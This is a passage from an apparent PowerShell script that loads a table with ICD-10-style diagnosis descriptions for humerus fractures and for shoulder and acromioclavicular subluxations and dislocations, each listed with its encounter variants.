transcondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of right humerus","Nondisplaced transcondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of left humerus","Nondisplaced transcondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transcondylar fracture of unspecified humerus","Nondisplaced transcondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right humerus","Torus fracture of lower end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left humerus","Torus fracture of lower end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified humerus","Torus fracture of lower end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of right humerus","Other displaced fracture of lower end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of left humerus","Other displaced fracture of lower end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of lower end of unspecified humerus","Other displaced fracture of lower end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of right humerus","Other nondisplaced fracture of lower end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of left humerus","Other nondisplaced fracture of lower end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of lower end of unspecified humerus","Other nondisplaced fracture of lower end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified shoulder girdle, part unspecified","Fracture of unspecified shoulder girdle, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of right shoulder girdle, part unspecified","Fracture of right shoulder girdle, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of left shoulder girdle, part unspecified","Fracture of left shoulder girdle, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right shoulder joint","Unspecified subluxation of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right shoulder joint","Unspecified subluxation of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right shoulder joint","Unspecified subluxation of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left shoulder joint","Unspecified subluxation of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left shoulder joint","Unspecified subluxation of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left shoulder joint","Unspecified subluxation of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified shoulder joint","Unspecified subluxation of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified shoulder joint","Unspecified subluxation of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified shoulder joint","Unspecified subluxation of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right shoulder joint","Unspecified dislocation of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right shoulder joint","Unspecified dislocation of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right shoulder joint","Unspecified dislocation of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left shoulder joint","Unspecified dislocation of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left shoulder joint","Unspecified dislocation of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left shoulder joint","Unspecified dislocation of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified shoulder joint","Unspecified dislocation of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified shoulder joint","Unspecified dislocation of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified shoulder joint","Unspecified dislocation of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right humerus","Anterior subluxation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right humerus","Anterior subluxation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right humerus","Anterior subluxation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left humerus","Anterior subluxation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left humerus","Anterior subluxation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left humerus","Anterior subluxation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified humerus","Anterior subluxation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified humerus","Anterior subluxation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified humerus","Anterior subluxation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right humerus","Anterior dislocation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right humerus","Anterior dislocation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right humerus","Anterior dislocation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left humerus","Anterior dislocation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left humerus","Anterior dislocation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left humerus","Anterior dislocation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified humerus","Anterior dislocation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified humerus","Anterior dislocation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified humerus","Anterior dislocation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right humerus","Posterior subluxation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right humerus","Posterior subluxation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right humerus","Posterior subluxation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left humerus","Posterior subluxation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left humerus","Posterior subluxation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left humerus","Posterior subluxation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified humerus","Posterior subluxation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified humerus","Posterior subluxation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified humerus","Posterior subluxation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right humerus","Posterior dislocation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right humerus","Posterior dislocation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right humerus","Posterior dislocation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left humerus","Posterior dislocation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left humerus","Posterior dislocation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left humerus","Posterior dislocation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified humerus","Posterior dislocation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified humerus","Posterior dislocation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified humerus","Posterior dislocation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of right humerus","Inferior subluxation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of right humerus","Inferior subluxation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of right humerus","Inferior subluxation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of left humerus","Inferior subluxation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of left humerus","Inferior subluxation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of left humerus","Inferior subluxation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of unspecified humerus","Inferior subluxation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of unspecified humerus","Inferior subluxation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior subluxation of unspecified humerus","Inferior subluxation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right humerus","Inferior dislocation of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right humerus","Inferior dislocation of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right humerus","Inferior dislocation of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left humerus","Inferior dislocation of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left humerus","Inferior dislocation of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left humerus","Inferior dislocation of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified humerus","Inferior dislocation of unspecified humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified humerus","Inferior dislocation of unspecified humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified humerus","Inferior dislocation of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right shoulder joint","Other subluxation of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right shoulder joint","Other subluxation of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right shoulder joint","Other subluxation of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left shoulder joint","Other subluxation of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left shoulder joint","Other subluxation of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left shoulder joint","Other subluxation of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified shoulder joint","Other subluxation of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified shoulder joint","Other subluxation of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified shoulder joint","Other subluxation of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right shoulder joint","Other dislocation of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right shoulder joint","Other dislocation of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right shoulder joint","Other dislocation of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left shoulder joint","Other dislocation of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left shoulder joint","Other dislocation of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left shoulder joint","Other dislocation of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified shoulder joint","Other dislocation of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified shoulder joint","Other dislocation of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified shoulder joint","Other dislocation of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right acromioclavicular joint","Unspecified dislocation of right acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right acromioclavicular joint","Unspecified dislocation of right acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right acromioclavicular joint","Unspecified dislocation of right acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left acromioclavicular joint","Unspecified dislocation of left acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left acromioclavicular joint","Unspecified dislocation of left acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left acromioclavicular joint","Unspecified dislocation of left acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified acromioclavicular joint","Unspecified dislocation of unspecified acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified acromioclavicular joint","Unspecified dislocation of unspecified acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified acromioclavicular joint","Unspecified dislocation of unspecified acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of right acromioclavicular joint","Subluxation of right acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right acromioclavicular joint","Subluxation of right acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right acromioclavicular joint","Subluxation of right acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of left acromioclavicular joint","Subluxation of left acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left acromioclavicular joint","Subluxation of left acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left acromioclavicular joint","Subluxation of left acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified acromioclavicular joint","Subluxation of unspecified acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified acromioclavicular joint","Subluxation of unspecified acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified acromioclavicular joint","Subluxation of unspecified acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, 100%-200% displacement","Dislocation of right acromioclavicular joint, 100%-200% displacement, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, 100%-200% displacement","Dislocation of right acromioclavicular joint, 100%-200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, 100%-200% displacement","Dislocation of right acromioclavicular joint, 100%-200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, 100%-200% displacement","Dislocation of left acromioclavicular joint, 100%-200% displacement, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, 100%-200% displacement","Dislocation of left acromioclavicular joint, 100%-200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, 100%-200% displacement","Dislocation of left acromioclavicular joint, 100%-200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, 100%-200% displacement","Dislocation of unspecified acromioclavicular joint, 100%-200% displacement, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, 100%-200% displacement","Dislocation of unspecified acromioclavicular joint, 100%-200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, 100%-200% displacement","Dislocation of unspecified acromioclavicular joint, 100%-200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, greater than 200% displacement","Dislocation of right acromioclavicular joint, greater than 200% displacement, initial encounter") + $null = 